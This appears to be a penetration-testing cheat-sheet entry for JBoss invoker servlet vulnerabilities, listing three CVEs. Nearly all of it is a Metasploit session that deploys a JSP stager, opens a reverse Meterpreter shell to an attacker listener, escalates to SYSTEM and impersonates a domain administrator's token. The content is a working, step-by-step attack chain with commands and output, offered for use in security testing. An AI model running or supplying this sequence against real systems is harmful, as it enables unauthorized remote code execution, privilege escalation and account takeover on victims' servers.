CVE

Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities

  • CVE-2007-1036
  • CVE-2012-0874
  • CVE-2013-4810

Usage

msf5 use exploit/multi/http/jboss_invoke_deploy

Examples

msf5 use exploit/multi/http/jboss_invoke_deploy
msf5 exploit(multi/http/jboss_invoke_deploy) > SET RHOSTS 10.10.10.10
msf5 exploit(multi/http/jboss_invoke_deploy) > SET RHPORT 8180
msf5 exploit(multi/http/jboss_invoke_deploy) > SET PAYLOAD windows/meterpreter/reverse_https
msf5 exploit(multi/http/jboss_invoke_deploy) > SET LHOST 10.10.10.1
msf5 exploit(multi/http/jboss_invoke_deploy) > SET LPORT 8443
msf5 exploit(multi/http/jboss_invoke_deploy) > run

[*] Started HTTPS reverse handler on https://10.10.10.1:8443
[*] Using manually select target: "Windows Universal"
[*] Deploying stager
[*] Calling stager: /EnyMtdpsHwfYUU/idIzmUiHUjmzdC.jsp
[*] Uploading payload through stager
[*] Calling payload: /BiAbpcPbeQku/MAhczELmEptIOJe.jsp
[*] Removing payload through stager
[*] Removing stager
[*] https://10.10.10.1:8443 handling request from 10.10.10.10; (UUID: 4goaaaae) Staging x86 payload (177241 bytes) ...
[*] Meterpreter session 1 opened (10.10.10.1:8443 -> 10.10.10.10:50537) at 1970-01-01 00:01:00 +0200

meterpreter > getsystem
...got system (via technique 1).
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
offsec.nl\adm-JohnDo

meterpreter > impersonate_token offsec.nl\adm-JohnDo
[+] Delegation token available
[+] Successfully impersonated user offsec.nl\adm-JohnDo
meterpreter > getuid
Server username: offsec.nl\adm-JohnDo

URL list